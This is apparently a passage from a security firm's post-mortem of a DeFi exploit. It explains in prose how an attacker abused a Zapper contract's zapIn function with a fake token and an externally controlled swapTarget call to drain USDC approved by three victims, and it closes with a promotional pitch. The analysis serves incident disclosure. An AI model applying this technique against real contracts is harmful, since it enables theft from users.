The attacker first queried the balance of one of the users
, and then called the zapIn function of the Zapper contract.
This function will transfer the token supplied by the requiredToken parameter to the contract.
The parameter passed in by the function can be modified externally, allowing the attacker to create a fake token for the requiredToken and then transfer it to Zapper contracts.
A call is made to the internal function zap, which checks whether the balance of the fake token in the contract is greater than or equal to the value supplied in.
The attacker is able to proceed to the next line of code because the balance value was already queried before.
The attacker created this function to transfer frax tokens to the Zapper contract, which will then be deposited into the vault.
The attacker was able to transfer USDC tokens from other authorized users since the contract specified by the swapTarget argument is called externally, and the parameters passsed to the call were also externally constructible.
The attacker repeated these actions three times, ultimately stealing the USDC balance from the accounts of three victims.
Our security team at Neptune Mutual can validate your platform for DNS and web-based security, smart contract reviews, as well as frontend and backend security. We can offer you a solution to scan your platform and safeguard your protocol for known and unknown vulnerabilities that have the potential to have catastrophic long-term effects. Contact us on social media if you are serious about security and have the budget, desire, and feeling of responsibility to do so.
Neptune Mutual project safeguards the Ethereum community from cyber threats. The protocol uses parametric cover as opposed to discretionary insurance. It has an easy and reliable on-chain claim process. This means that when incidents are confirmed by our community, resolution is fast.
Join us in our mission to cover, protect, and secure on-chain digital assets.